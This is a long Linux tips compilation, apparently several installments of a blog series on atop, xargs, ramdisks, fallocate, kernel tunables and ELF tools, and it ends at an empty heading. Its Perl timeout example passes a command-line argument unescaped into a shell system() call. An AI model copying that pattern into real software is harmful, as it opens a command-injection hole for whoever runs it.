If you’re a fan of virtualization, you have come across sparse files – virtual machines disks can be sparse files. If you’re creating virtual machines with, say 10GB space, but do not preallocate it, then you have witnessed sparse files in action! Dynamically expanding virtual disks are sparse files.

Sparse files have the advantage of conserving space until it is needed, but if you convert them back to a raw format (as during the conversion of VMDK virtual disks to the AMI format for use in the Amazon EC2 cloud), the files will be inflated back to their normal size. Now, the big question is: why sparse files, and what are they good for?

Well, sparse files are definitely useful in virtualization, but they have other uses. For example, when creating archives or copying files, you may or may not want to use the sparse option, depending on your requirements. Let's see how we can create and identify sparse files, so we can treat them accordingly.

Create sparse files

Creating sparse files is very simple. Just move the pointer to the end of the file.

dd if=/dev/zero of=file bs=1 count=0 seek=1M

For example, here we have created a file of zero size, save for the metadata, which by default takes the customary block size (say 4096 bytes). But we have also moved the pointer to the end of the file, to the 1M mark, thus creating a virtual 1MB file.

Sparse create

Now, using the ls command, you may think it’s a regular file:

Reported size

But you need the -s flag in the ls command options to really know what's happening. The first field in the output will be the allocated size, in KB:


Similarly, you can use the du command to get the accurate report:

du command

Just for comparison, here’s what a real, 1MB file reports:

ls real file

du real file

Pay attention to this when working with files. Do not get confused by crazy ls readings, because you may end up with a total that exceeds the real disk size. Use the appropriate flags to get the real status.
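Putting the pieces together, the whole comparison can be reproduced in a few commands (allocated block counts vary slightly by filesystem):

```shell
# Create a 1 MB sparse file: seek past the end without writing any data.
dd if=/dev/zero of=sparse.img bs=1 count=0 seek=1M 2>/dev/null

# Apparent size (what plain ls reports) vs. blocks actually allocated.
ls -l sparse.img     # apparent size: 1048576 bytes
du -k sparse.img     # allocated: 0 KB (or close to it)
```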

Moreover, pay attention when working with file handling, compressing and archiving tools, like cp, tar, zip, and others. For instance, cp has an option that specifies how the sparse files should be handled.

man page

2. Having fun with atop

It’s not a spelling error, there’s no space missing between the letter a and top. atop is a top utility, with some spice. The full description is AT Computing’s System & Process Monitor, an interactive utility to view the load on a Linux system. It can do everything top does, and then some.

atop is a very useful program and you’ll fall in love instantly. The main view is very similar to the original tool, except you have more info and it’s arranged in a more intuitive fashion. You’ll also have color readings for critical percentage of resource usage.


In the bottom half of the main view, you will be able to sort the process table based on different columns, like memory or disk. Press m to sort by memory in the descending order. Press d to sort by disk activity in the descending order.



You can save data into flat files, any which way you want.


Better yet, you can also write data to logs in compressed, binary form and then parse relevant fields, compiling useful time-dependent statistics about your system load and usage, helping identify bottlenecks and problems. The manual page is very detailed and provides examples to get you started instantly.

For instance, the following command:

atop -w /tmp/atop.raw 30 10

will collect the raw data every thirty seconds, a total of ten times. Very similar to iostat and vmstat, as we saw last time. Afterwards, you can pull out the desired subsets very easily.

For example, to view the processor and disk utilization of this file in parseable format:

atop -PCPU,DSK -r /tmp/atop.raw

Here’s what the data looks like:


Now, if you don’t like the separator, just remove it with some simple sed-ing.

atop -PCPU,DSK -r /tmp/atop.raw | sed -e '/^SEP$/d' > /tmp/f-clean.csv
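The sed expression just deletes every line consisting solely of the separator; with a small synthetic input:

```shell
# Two atop-style records with a SEP separator line between them.
printf 'CPU,host,1\nSEP\nDSK,host,2\n' > sample.raw

# Drop the separator lines, keep everything else.
sed -e '/^SEP$/d' sample.raw
```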

Then, you can open this file in, say OpenOffice and create some impressive graphs:



3. ASCII art

ASCII art won’t make you an expert, but it can be fun. Oh, I’m not talking about using high-end tools like GIMP; anyone can do that. I’m talking about deriving fun ASCII art from the command line.

There are several ways you can achieve this, we will see two.


boxes is a neat little utility that lets you create your own command-line fortune cookies, similar to what Linux Mint does. The tool has a number of template ASCII figures available, on top of which you add your own little slogans.

boxes is available in most repositories, so go grab it. Then, start playing. For example, to have a cute little kitten write something witty in your terminal, run boxes -d cat, type your own message and hit Ctrl + D to end. Soon thereafter, a little cat will show in the terminal, along with your own message.

boxes -d cat

Innocent, sweet and fun.


jp2a, an ominous-sounding name, is not one of those robots in Star Wars. It’s a utility that can convert JPEG images, any one you want, into ASCII art. Very useful and impressive.

For example, take your stock Tux. Now, the image I found was in the PNG format and jp2a does not handle these. So I had to convert the image to JPEG first.


And then, just run the command against the image name and Voila! Tux is your uncle!

Tux converted

4. xargs

xargs sounds like a peon curse from Warcraft I-III, but it’s in fact a very powerful and useful command that builds and executes commands from the standard input. In other words, when you use complex chains of commands in Linux, sometimes separated by the pipe symbol (|), you may want to feed the output of the last command into the input of the next one. But things can get complicated.

Luckily, xargs can do everything you need. Let’s see a few simple examples.

Example 1:

We will display all the users listed in the /etc/passwd file. Then, we will sort them and print them to the console, each on a separate line.

The command we need is:

cut -d: -f1 < /etc/passwd | sort | xargs echo | tr ' ' '\n'

Example 1

xargs takes the list of usernames and echoes them to the console on a single line, while the tr command then replaces each space delimiter with a newline, printing one name per line.

Example 2:

Here’s another example. xargs is particularly useful when run with the find command and quite often sed. Let’s say you want to find a list of certain files in your directory and then manipulate them, including changing their permissions, deleting them or just listing them.

With xargs, you can make this affair a one-liner.

find . -type f -print0 | xargs -0 ls

Example 2

Here we’re using xargs with the -0 flag, which instructs it to treat the null character as the input delimiter instead of whitespace, and to take quotes and backslashes literally, making it quite useful if you expect your files to contain quotes, spaces and other exotic characters. To do this, xargs requires the find command to provide input in the right format, which is exactly what the -print0 flag does.

If you’re not convinced xargs is mighty, try doing a few exercises without it and see if you can manage to get the job done in a single line of shell code.
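To see the null-delimited pipeline in action on files you can safely destroy, here is a small sketch (the /tmp/xargs-demo directory and file names are invented for the demo):

```shell
# Create files whose names contain spaces -- the classic case where
# a plain find | xargs pipeline breaks.
mkdir -p /tmp/xargs-demo
touch "/tmp/xargs-demo/a file.txt" "/tmp/xargs-demo/plain.txt"

# Null-delimited find output survives the spaces; xargs -0 deletes both.
find /tmp/xargs-demo -type f -name '*.txt' -print0 | xargs -0 rm -f
ls -A /tmp/xargs-demo
```

Both files are gone afterwards, including the one with a space in its name.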

5. Swapon/swapoff

Another allegory, Karate Kid. Wax on, wax off. Except that we’re dealing with the command that handles swap files on Linux. I do not know how often you will have to handle swap manually, but if you’re using live CDs or work with RAID, then you just might.

swapon/swapoff allows you to turn on/off swap devices, set their priority and just plain list them. Changing the priority could be useful if you have swaps of different sizes or set on disks with different speeds.

For example, to view all swap devices:

swapon -s

A screenshot of a typical output:


And sometimes, you just may want to turn swap off. For example, swap may be used by the live CD, preventing you from unmounting the disk for partitioning, which could lead to errors. In this case, a simple swapoff will do the trick.

Speaking of disks and speeds …

6. Use ramdisk for lightning-fast execution

RAM is not cheap and you should not waste it as simple storage space if you don’t need to. But sometimes, just sometimes, you may be in a bit of a hurry and would like to get your project completed as soon as possible. If your work entails quite a bit of disk activity, which is usually the bottleneck of program execution on modern machines, then using a ramdisk could help.

ramdisk is a file system created in the system memory (RAM) and treated as a regular disk device, hence its name. For all practical purposes, if you give someone a system with a RAM disk, they won’t know the difference, except the speed. ramdisks are much faster.

Here’s a little demo.

First, let’s create a ramdisk (as root or sudo):

sudo mkdir -p /tmp/ramdisk
sudo mount -t tmpfs none /tmp/ramdisk -o size=50M


We created a 50M disk and mounted it under /tmp/ramdisk. And now, let’s compare some basic writes …

Normal disk:


RAM disk:


Of course, the results will depend on many factors, including system load, disk type and speed, memory type and speed, and whatnot, but even my 23-second demonstration shows that using a ramdisk you can boost your performance by 50% or more. And if you attempt repetitive serial tasks like copying, you will be able to improve your execution time by perhaps an order of magnitude.
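You can get a rough feel for the difference without root by writing to /dev/shm, a tmpfs that most Linux distributions mount by default (the sizes and paths here are arbitrary, and absolute numbers will vary wildly between machines):

```shell
# Time a 16 MB write to a disk-backed path versus tmpfs-backed /dev/shm.
start=$(date +%s%N)
dd if=/dev/zero of=/tmp/disk-test.img bs=1M count=16 conv=fsync 2>/dev/null
mid=$(date +%s%N)
dd if=/dev/zero of=/dev/shm/ram-test.img bs=1M count=16 2>/dev/null
end=$(date +%s%N)
echo "disk: $(( (mid - start) / 1000000 )) ms, ram: $(( (end - mid) / 1000000 )) ms"
```

The fsync on the disk write keeps the page cache from masking the real cost.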

7. Perl timeout (alarm) function

Again, Perl as the last item. Now, I have to reiterate, I’m not a skilled Perl writer. I am a cunning linguist and a master debater, but my Perl skills are moderate, so don’t take my perling advice as a holy grail. But you should definitely be familiar with the timeout function, or rather – alarm.

Why alarm?

Well, it allows you to gracefully terminate a process with SIGALRM after a given timeout period, without having your program stuck forever, waiting for something to happen.

Now, let’s see an example. If you’ve read my strace article, then this little demo should remind you of some of the things we’ve seen there.


#!/usr/bin/perl
use strict;
my $debug=1;

eval {
    local $SIG{ALRM} = sub { die "alarm\n" }; # NB: \n required
    alarm 5; # timeout after 5 seconds without response
    system("/bin/ping -c 1 $ARGV[0] > /dev/null");
    alarm 0;
};

if ($@) {
    die unless $@ eq "alarm\n";   # propagate unexpected errors
    print "\nWe could not ping the desired address!\n\n" if $debug;
    # timed out
}
else {
    print "\nWe're good!\n\n" if $debug;
}
What do we have here? Well, a rather simple program. Let’s examine the different bits separately. The first few lines are quite basic. We have the perl declaration, the use of strict coding, which is always recommended, and a debug flag, which will print all kinds of debugging messages when set to true. Rather useful when testing your own stuff.

Next, the eval function, which tells the program to die with ALRM signal if the desired functionality is not achieved within the given time window (in seconds). Our example is a simple ping command, which takes the IP address as the input argument and tries to get a reply within five seconds.

eval {
    local $SIG{ALRM} = sub { die "alarm\n" }; # NB: \n required
    alarm 5; # timeout after 5 seconds without response
    system("/bin/ping -c 1 $ARGV[0] > /dev/null");
    alarm 0;
};

Next, we check for error messages ($@) and print a message informing the user that we could not ping the desired address. What’s more, if the program execution got botched for some reason other than our timed alarm, we terminate the execution, thus covering all angles. If successful, we continue with our work, plus some encouraging messages.

if ($@) {
    die unless $@ eq "alarm\n";   # propagate unexpected errors
    print "\nWe could not ping the desired address!\n\n" if $debug;
    # timed out
}
else {
    print "\nWe're good!\n\n" if $debug;
}

Some screenshots … Here’s the perl code. P.S. Just noticed the 10 seconds in the comment after alarm 5; well, it’s an innocent error, but it does not affect the code, so you can ignore it.


Then, we have a good example:


And a bad one:


And just to show you it’s a five-second timeout we’re talking about, I’ve used the time command to … well, time the execution of the script run:


ping is just a silly example, but you can use other, more complex functions. For example, mount commands. In combination with strace, which we’ve seen a few weeks ago, you can have a powerful trapping mechanism for efficient system debugging.
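Not from the article, but worth knowing: if you just need the timeout behavior without writing Perl, coreutils ships a timeout command that wraps any command with the same kind of alarm.

```shell
# Run a command under a 2-second deadline; timeout sends SIGTERM when
# the deadline passes and exits with status 124.
timeout 2 sleep 5
echo "exit status: $?"
```

Handy for mount commands, network probes and anything else that may hang.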

To read more about alarm, try the official documentation: perldoc -f alarm. To this end, you will need the perl documentation package installed on your system.

Why this exercise?

Well, it emphasizes the importance of proper checks when coding programs that use external inputs and outputs to work. Since you cannot guarantee that the other bits of code will cooperate with yours, you need to place failsafe checks to make sure you can gracefully complete the run without getting stuck. Along with input validation, timeouts and error exits are an integral part of cavalier programming.


That’s it, seven lovelies this time. A magnificent seven. I did promise you sec, but it’s too large to be just a bullet item. We will have a separate article soon, probably as a super-duper admin tool.

Anyhow, today you’ve learned several more useful tools, tricks and commands that should help you better understand your environment, work more smartly and control and monitor your systems more effectively. Best of all, the tips given do not really require any specific platform. Any Linux will do. I used openSUSE 11.2, Ubuntu Jaunty and Ubuntu Karmic for these demos.

I hope you appreciate the combined effort. Stay tuned for more. We’ll have several more compilations as well as dedicated, detailed articles on some of the more powerful programs available, including both mid-end and high-end tools, as well as advanced system debugging utilities.

Welcome to the third installment in the Linux cool hacks series. Like the previous two, this article is all about cool things you can do with your Linux that are not well known and yet rather useful. When I say cool, this applies to laughing hard at XKCD’s sudo make me a sandwich style of people rather than someone wearing Zara flipflops, although those are not mutually exclusive.

Anyhow, we’ve had some 17 tips so far. Let’s try a few more. I will demonstrate using Ubuntu, openSUSE and CentOS, to show you that the choice of the system does not really make much difference. So please join me. Tomorrow, after having read and practiced these tricks, you will be able to impress your significant others and colleagues and there ought to be much rejoicing.

1. Show (kernel) functions in ps output

This is an interesting need. Say you have a program that is misbehaving. You do not want or cannot attach the debugger to it, as you fear you may disrupt some delicate time-race condition or possibly even crash the application. Or it may be stuck in a non-debuggable state. Or it may not have symbols or deny ptrace hooks or who knows what else. All in all, lots of geek lingo, the bottom line is, you just want to know at what stage the execution of the software is stuck, in the quickest, least intrusive way possible. ps will do.

This one specific example is even written in the man page:

ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:14,comm

And you will be able to see in the WCHAN column, the last function being used by your process. Most of the time, this will be completely meaningless, but if you have an inkling of understanding how your process ought to behave or you might be a developer, this could be useful information.

ps, wchan

2. Nohup

Nohup is a special Linux command that lets you detach processes from their shell, allowing them to run in what you might want to refer to as the background service mode. Indeed, if you take a look at the process table (ps), you will see a lot of processes that were spawned by the system and run without a tty.

When you start a program from the command line, it will live within the shell of your terminal window, even if you background it with &. When you kill the shell, all of its child processes will die too. In a few select cases, we want to avoid this, so we need a mechanism that will detach processes from their shell. A simple method is to create a startup script and add it to /etc/init.d, but this should really be reserved for services.

So nohup will daemonize our processes – make them daemons. Sounds scary, but it’s just geek lingo designed to impress girls. Anyhow, nohup is invoked against the desired binary or script. You need a full path if the binary or script is not present in the PATH. You must also background nohup itself, so that it detaches from the shell.

nohup <command> &

Nohup will redirect the output to nohup.out in the current directory. You should also make sure to use the proper redirection for the standard input, output and error to avoid hangs.

Here’s an example. Notice that the nohup-ed script runs without a terminal, as denoted by ? in the sixth column. For instance, the grep command runs on the virtual terminal pts/3. Moreover, the script is parented by init (PID = 1). And you can also see the nohup output, which is just a silly echo in this example.
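A minimal sketch of the pattern (the sleep command and the PID file are stand-ins for a real long-running job):

```shell
# Detach a long-running command from the shell and record its PID.
cd /tmp
nohup sleep 30 >/dev/null 2>&1 &
echo $! > /tmp/nohup-demo.pid

# kill -0 merely checks that the process exists; then clean up.
kill -0 "$(cat /tmp/nohup-demo.pid)" && echo "still running"
kill "$(cat /tmp/nohup-demo.pid)"
```

Even after the launching terminal closes, the sleep would keep running until killed.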


3. Fallocate

Fallocate sounds like a meme, but it is a very neat command that can save you a lot of time. To prove that, let me ask you a question first. What do you do if you need to create a very large file, which cannot be sparse? You use dd and source the bit stream from /dev/zero, but this takes a long time. It’s normally limited by the device speed, which is about 80MB/s for most disks. So if you need to create an 80GB file, you will need some twenty minutes to do that, in the best case. With USB connections and slower disks, this can grow to 40 minutes or longer. fallocate solves the problem by preallocating blocks instantly.

This is a relatively new command and system call in the Linux kernel, available since revision 2.6.23. All right, let us demonstrate.

First, we create a 10MB file. Nothing special. But then, to show you how powerful this command really is, we will compare with dd. While files this small could easily be written to disk cache, masking the true speed, the demonstration is powerful enough without having to use large files.

fallocate -l 10m 10mbfile


Now, the comparison. Notice the actual time differences between fallocate and dd. Even for such a tiny file, the difference is huge. fallocate is some 70 times faster in terms of system time, even though the entire operation took a fraction of the second.

fallocate speed

dd speed

Now, fallocate will remain as fast regardless of file size, while dd times will increase. When you have to create files that are several GB in size or much larger, you will appreciate this capability. For example, you may need to create swap files in this manner and preallocate them to partitions during the installation setup. You might not be able to wait long minutes or possibly hours for this operation to complete. Fallocate resolves the problem.
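A side-by-side sketch you can reproduce (the file names are arbitrary; fallocate needs a filesystem that supports preallocation, which ext4, XFS and tmpfs all do):

```shell
# Preallocate 10 MB instantly, then write the same amount with dd.
fallocate -l 10M /tmp/fa-file
dd if=/dev/zero of=/tmp/dd-file bs=1M count=10 2>/dev/null

# Both files end up the same size; only the time spent differs.
stat -c '%n %s' /tmp/fa-file /tmp/dd-file
```

Wrap each command in time to see the gap grow as the sizes do.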

4. Debug filesystems (debugfs)

Debugfs is an interactive tool for managing EXT filesystems. Invoked from the command line, it allows you to change the mode, block size, write to the superblock, force the filesystem to execute specific commands, and more. Naturally, this kind of work means you know what you’re doing and you’re well aware of the potential hazards of data corruption when working against devices and their filesystems in a sort of live operation mode.

debugfs is invoked against the desired target device. By default, it will open the filesystem in read-only mode, as a precaution. This is quite useful for trying to salvage data from corrupted filesystems. Other commands that come into mind when trying to work with filesystems include tune2fs and resize2fs.


5. Blacklisting drivers

The Linux kernel comes with a ton of drivers, some compiled into the kernel, during the kernel compilation, which is done by specifying Y, some available as dynamically loadable modules, which is done by specifying M. The modules will later show under /lib/modules, matching your kernel.

Now, the kernel footprint could be big and contain too many drivers that you do not need or even contain conflicting drivers that interfere with your work. For instance, you might not want ipv6, which is something we tried in my Realtek network troubleshooting on Kubuntu Natty on my latest desktop, or perhaps you might not want the Nouveau graphics driver, as it conflicts with the Nvidia driver and prevents its installation, as we have seen in my CentOS Nvidia guide.

There are several ways you can disable drivers – by blacklisting them. Not a new thing, we’ve done the same back in 2006 with my Linux guide of highly useful configurations. You can make permanent changes by editing files on your system or pass parameters to the kernel commandline in the GRUB menu.

Using the CentOS example, you can disable the Nouveau driver by appending the following string to the kernel command line:

kernel /boot/vmlinuz <all kinds of options> rdblacklist=nouveau

Once your system boots and you are 100% confident the change works well, you can make it permanent, either by editing the GRUB menu or by adding the driver to the /etc/modprobe.d/blacklist or /etc/modprobe.d/blacklist.conf file, depending on your distribution.

echo "blacklist <driver name>" >> /etc/modprobe.d/blacklist

Please make sure you have backups before you permanently alter your system. Finally, some drivers will have writable parameters exposed under /proc and /sys, allowing you to echo new values on the fly and make changes as necessary. We will discuss that a while later.

6. Browsing the kernel stuff

This is a vague title, but what I’m referring to is the capability to quickly inspect kernel functions, check header files, determine whether your applications are trying to run code that belongs to the kernel or something else and so forth. To this end, there are many tools you can use. We’ll examine a few.

First, you can go online to LXR – The Linux Cross Reference site, which indexes all source code in the kernel repositories. So if you’re looking for some function, just input the name or part thereof into the search box and start reading.

LXR site

Then, there’s cscope, which we saw in the Kernel Crash Book. If you have kernel sources installed on your machine, you will be able to check what functions, text strings, symbols and definitions are declared in different source files. This is quite useful if you are trying to debug problems with your applications or perhaps even kernel crashes. To that end, you might also be interested in ctags.


7. Some extras

The tips listed below will probably not serve you that often, but it is good to know about them. Almost like hoarding water for the nuclear winter, so to speak, only more fun. Now, please note that you should not follow the advice below blindly!

It’s a sort of a paradox, but unlike so many people out there, I will not give you blanket suggestions on how to utilize your machines, as every single use case is different. Saying that X will speed up Y is utterly and morally wrong. One man’s tweak blessing is another’s curse. Do not change configurations just because someone somewhere said it ought to work, make your system faster, be more responsive, etc. 99% of these wild and happy recommendations are valid for single home machines with no regard to reality, especially not businesses with heavily loaded production servers. Therefore, be aware of the possibilities, study them carefully and then apply your best formula.

/proc and /sys tunables

Explaining what /proc and /sys do is beyond the scope of this article by three whole quantum leaps. But they are very important pseudo-filesystems that let you tweak all kinds of things, on the fly, no reboot required.

In this section, I will try to elaborate on several useful features, like CPU affinity, memory tunables, scheduling, and a few other items that will normally earn you a good beating from your neighbors if you ever speak of them in public. Let’s do it.

For example, if you have a multi-processor system that does very specific tasks, you might want to bypass the internal scheduling mechanisms and force your cores to process only certain workloads. Normally, this tradeoff has more problems than benefits, so please don’t make any changes just for the sake of being cool.

To give you a practical example, you might want to assign interrupt handling for most heavily used network channels to CPU1, while allowing the rest of the tasks to work on CPU2. Indeed, if you have a box that has several network devices and churns data like mad, loading one specific processor might be a good idea in ensuring the quality of service for other tasks. Then again, you could ruin everything, so be careful.

To get this going, you need the processor bitmask, which you can derive from the number of available processors on your box, as well as the corresponding interrupt for the channel you wish to assign to a specific processor.

cat /proc/cpuinfo

cat /proc/interrupts


And then, we do the magic – force IRQ 30 (Wireless, iwlagn) to the first processor (the value is a hexadecimal bitmask, so 1 selects CPU0):

echo 1 > /proc/irq/30/smp_affinity

Of course, your kernel must be capable of symmetric multi-processing, which is a default in all new kernels. It’s not a given for older kernels like 2.6.16 and 2.6.18 in previous but still much used enterprise editions of SUSE and RedHat.
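Since the affinity value is a hex bitmask with bit N selecting CPU N, you can compute the mask for any CPU number straight from the shell (a generic sketch, nothing machine-specific):

```shell
# Mask for CPU0 is 1, CPU1 is 2, CPU2 is 4, and so on; combine masks
# with bitwise OR to target several CPUs at once.
cpu=1
printf '%x\n' $(( 1 << cpu ))
printf '%x\n' $(( (1 << 0) | (1 << 3) ))   # CPU0 and CPU3 together
```

Echo the resulting value into /proc/irq/<irq>/smp_affinity as root to apply it.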

More reading here:

Memory management

Linux memory management is the blackest of magics in the world. But it’s a fun thing, especially if you know what you’re doing. Like I mentioned before, no one setting will work for everyone. There’s no golden rule. The system defaults are as good as empirically possible for the widest range of uses, so you should stick with that.

If however, you feel really adventurous, you might want to explore the kernel tunables under /proc/sys/vm. There are several of those.

The swappiness parameter tells you how aggressively your system will try to swap pages. The values range from 0 to 100. In most cases, your disk will always be the bottleneck, so it will make little difference. Then, there’s the dirty_ratio tunable, which tells the percentage of total system memory that can be taken by dirty pages. Once this limit is hit, the system will start flushing data to the disk. Another parameter that is closely related to the dirty_ratio is dirty_expire_centisecs, which determines the max. age of dirty pages before they are flushed. The system will commit the dirty data based on the first of the two parameters to be met, which will most likely be the expire time.

Centisecs value

A mental exercise: the default dirty_ratio on Linux is 40%, while the default expire tunable is set to 3000 centiseconds. A centisecond is 1/100 of a second or 10ms, so we have 30 seconds total. If you have a machine with 4GB RAM, then 1.6GB will be dedicated to dirty pages at most. Now, this means that whatever you’re writing, it needs to create some 55MB of data every second to exceed this threshold in the thirty-second period for the kernel flushing thread to wake and start writing to the disk. In most cases, you will rarely have such aggressive writes. Some notable examples include large copies, video rendering and alike. In daily use, hardly ever. If you have more than 4GB RAM, say 8-16GB, then this becomes even less likely.

This exercise also tells you whether you really need that high dirty_ratio, how to set the other tunables and more. Having too many dirty pages also means very long and sustained writes when the time comes to commit them to disk. Food for thought, fellas. There’s no golden rule.
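The current values of these tunables are world-readable, so you can inspect them before touching anything (paths per the standard /proc/sys/vm layout; writing them needs root):

```shell
# Read the memory tunables discussed above.
cat /proc/sys/vm/swappiness
cat /proc/sys/vm/dirty_ratio
cat /proc/sys/vm/dirty_expire_centisecs
```

Plug your own RAM size and these values into the exercise above to see where your machine stands.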

As you can see, I’m breezing through these extremely lengthy and complex topics, but the idea is not to write a PhD on memory management, but give you a very brief sampling of the possibilities, so you can later explore and use them.

You can make changes by echoing values to /proc or using sysctl.

A very geeky read (direct link) for RHEL4, but still very much relevant today.

Another thing you may want to attempt is to allow/disallow memory overcommitment. Normally, Linux uses smart heuristics for managing overcommitment, but if you are really worried about how your system hands out its quiche to processes, then you can disable overcommitment or set a ratio. I would recommend against any changes, unless you have very strict requirements, you cannot afford the OOM mechanism to kick in, etc.

I/O scheduling

Another geeky item, best left alone. But if you must, please read on. First of all, most I/O elevator algorithms assume platter-based disks, so if you’re running with SSD, the rules of the game change, but this has been taken into account in recent kernels. Assuming you’re running on plain old mechanical hardware, you have one simple goal: as few seeks as possible, to minimize access times and wear, which translates into lower latency and better responsiveness for the user. Then again, some of your machines might be running pure computation tasks, so responsiveness might not be an issue.

But in general, we want to perform write operations in bursts, as much data as possible. There are four available schedulers:

noop – the most basic; dispatches requests as they come, normally good for disks on key and systems with heavy CPU usage.

anticipatory – longer delays, so there’s more chance of starvation, however it tries to maximize throughput and reduce seeks.

cfq – better known as the completely fair queue scheduler; it relies on process behavior and can be used with ionice to achieve balanced throughput. It does not prefer writes or reads.

deadline – tries to dispatch as quickly as possible, treating tasks as real-time, in order to avoid process starvation.

You can issue the change per disk:

echo <scheduler> > /sys/block/<device>/queue/scheduler

For instance:

echo cfq > /sys/block/sdb/queue/scheduler

All this sounds dandy, but the real challenge is figuring out what your machines are doing and match the behavior accordingly. After you have made the change, you will need to test your results. In the Linux world, you will most commonly find cfq or anticipatory as the default choice.
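To check what you are currently running, the active scheduler is shown in brackets in each device's queue file (a read-only sketch; the device list varies per machine):

```shell
# Print the scheduler line for every block device that exposes one.
for q in /sys/block/*/queue/scheduler; do
    [ -r "$q" ] || continue
    printf '%s: ' "$q"
    cat "$q"
done
```

Typical output looks like "noop deadline [cfq]", with the bracketed entry active.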

Of course, if you make changes to the scheduler, then you might also want to tweak the readahead settings, both the readahead max. value and the throughput value, as well as the number of simultaneous I/O requests. The corresponding tunables include nr_requests, read_ahead_kb and inode_readahead_blks. Some of the values will be limited by the filesystem choice. Let me disappoint you and tell you that you will have to work hard to see significant improvements.

Some reading on schedulers: Linux Journal – I/O Schedulers.

Filesystem mount options

Like the disk, we want speed. That’s the basic driver here. So let’s see what kind of options we can use. The most notable focus is on the journaling capabilities of modern filesystems.

This is another black magic, but something you can test with relative safety. Choose any old disk, preferably with a single partition to avoid masking results by typical disk speed bottlenecks. Then, test various mount options. Some of the notable performance boosters so to speak include:

writeback mode – only the metadata is journaled, and the data blocks are written directly to their location on the disk. This preserves the filesystem structure and avoids corruption, but data corruption can occur. For example, if the system crashes after the metadata is journaled but before the data block is written.

ordered mode – metadata journaling is done after the data is written to the disk. In this way, data and filesystem are guaranteed consistent after a recovery.

data mode – both metadata and data are journaled. This mode offers the greatest protection against file system corruption and data loss but can suffer from performance degradation, as all data is written twice (first to the journal, then to the disk).

Some more reading: Anatomy of Linux journaling filesystems.

All right, now that we know what we need, we can simply mount a filesystem with the writeback option. You should test extensively to make sure things work out fine, or at the very least, use this option for filesystems with heavy access but not containing critical data.

mount -o data=writeback /dev/<device>  /<mountpoint>

You might also want to consider noatime and nodiratime, but again don’t listen to one geek trying to impress you with words, do your own testing and prove everyone else wrong.

And I guess that would be enough for today. Other items that you might want to look at include slabinfo/slabtop, huge pages and Translation Lookaside Buffers (TLB). That’s different from the TLB that stands for Tomato, Lettuce and Bacon, a different kind of hack. Some screenshots and we’re done here.

slabinfo, slabtop

Huge pages config


There you go, another lovely set of geekiness. Again, the real value in these hacks is the exposure not the actual application. Be aware of the functionality, study it, and then apply it to your personal or business needs one day. And remember that no two computers and use cases are the same, so blind copy & paste will not work.

That would be all, I guess. You are also welcome to check the first and the second article, as well as the whole series of so-called super-duper admin tools. We will also have an extensive review on the Gnu Debugger (gdb) soon. Stay pretty.

Once article numbers start to run high, people tend to start paying less attention to the content. However, by no means does that make this article any less useful or interesting. I happen to have a fresh new bunch of tips and tricks that ought to increase your Linux street credit.

In the first two parts, we focused on system administration mostly. The third part focused on system internals. This fourth chapter will elaborate on compilation and fiddling with Linux binaries, specifically the ELF format. Again, not everyone’s lunch or dinner, but some of you may appreciate the extra geekiness I devoted to making your lives easier. So please follow me.


1. Learn more about the file – no strings attached

Say you have a binary of some sort – a utility, a shared object, a kernel module, maybe even an entire kernel. Now, using file will give some very basic information on what kind of object you’re dealing with. But there’s more. Strings. Now, the subtitle makes a lot of punny sense, hihihihihihi.

Strings is a very useful command that can pull out all printable characters out of binary files. This can be quite useful if you need to know the would-be meta data, like compiler versions, compilation options, author, etc. For example, here’s what it looks like for a kernel vmlinuz file. Some of you may actually recognize some of the print messages there.


2. Debugging symbols

Now, say you wish to debug your faulty application, but for some reason all of the functions in the backtrace come out with ?? marks. The simple reason is that you may not have debug symbols installed. But how would you know?

Well, apart from checking the installed database of RPM or DEB files, you may want to query the files directly. Again, we will use the file command, and then delve deeper into the system. Here’s an example:

Stripped object

What we see here is that we have a 32-bit Little Endian shared object for the Intel architecture, stripped of symbols. That’s what the last word tells us. This means the binary was compiled without symbols or they have been removed afterward to conserve space and improve performance. We discussed symbols in the Kernel Crash book, too.

So how do you go about having or not having debug symbols? Another highly useful tool that should let you get binary symbols is nm. This tool is specifically designed to get symbols from various sections in the executable file format that is typical on Linux.

For instance, symbols marked B or b are uninitialized global variables in the data section, also known as BSS, while C marks common symbols, or rather uninitialized data. In our example, there are none available, because our shared library is stripped.

nm example

However, if you query with the -D flag, you will get the dynamic symbols, which survive stripping because the runtime linker needs them.

Global table
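To see the difference in practice (assuming binutils is installed), compare the regular and dynamic symbol tables of a stripped system binary:

```shell
nm /bin/ls || true        # usually reports "no symbols" on a stripped binary
nm -D /bin/ls | head -5   # dynamic symbols survive stripping
```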

For most people, this information is completely useless. But for senior system admins and software developers, knowing exactly the mapping of code in a binary and translation of memory addresses to function names is essential.

Playing with symbols – objdump, objcopy, readelf

We can add and remove symbols as we please, after the compilation. To that end, we will use several handy utilities, including objcopy and readelf. The first allows manipulating object files. The second lets you read data from binary files in a structured, human-readable format.

We will begin with readelf. The simplest way is to dump everything. This can be done using -a flag, but beware the torrents of information, which probably won’t mean much to anyone but developers and hackers. Still good to know and impress girls.

readelf, all

Another useful flag is --debug-dump=info, in case you are interested in the debug info only. Here, specifically, we compile our test tool with debug symbols, and then display the info. Please note that we have a lot of information here:

Debuginfo not stripped

Now, objcopy can manipulate files so that the above information is kept, removed, or stored elsewhere. For instance, you might want to compile a binary with debug symbols for testing purposes, but distribute a stripped version to your customers. Let’s see a few practical use cases.

To remove debug info from the original binary:

objcopy --strip-debug foo

This will result in a stripped binary, just like we saw earlier. But then, you might not want to toss away those symbols permanently. To that end, you can extract the debug info and keep it in a separate file:

objcopy --only-keep-debug foo foo.dbg

And then, you can link debug info back to the stripped binary when you need it:

objcopy --add-gnu-debuglink=foo.dbg foo
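Here is the whole cycle as a sketch, run against a scratch copy of /bin/ls rather than a real project binary (assumes binutils is installed):

```shell
cp /bin/ls foo
objcopy --only-keep-debug foo foo.dbg    # save whatever debug sections exist
objcopy --strip-debug foo                # lean binary for shipping
objcopy --add-gnu-debuglink=foo.dbg foo  # record where gdb can find the symbols
readelf -S foo | grep gnu_debuglink      # verify the link section was added
```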

On the far end of the spectrum, we get objdump, another handy utility. Again, we used the program before, when playing with kernel crashes, so we are no strangers to its power and functionality. Similar to readelf, objdump lets us obtain information from object files. For example, you may be interested in the comment section of your binary:

objdump, comments

Or you may want everything:


Combined example

Now, let’s see this in practice. First, we compile our code with -g flag. The binary weighs some 18299 bytes. Then, we strip debug information using objcopy. The resulting binary is now much smaller, at 13042 bytes. And readelf shows nothing, unlike before.

Remove symbols

3. Compilation optimization tips

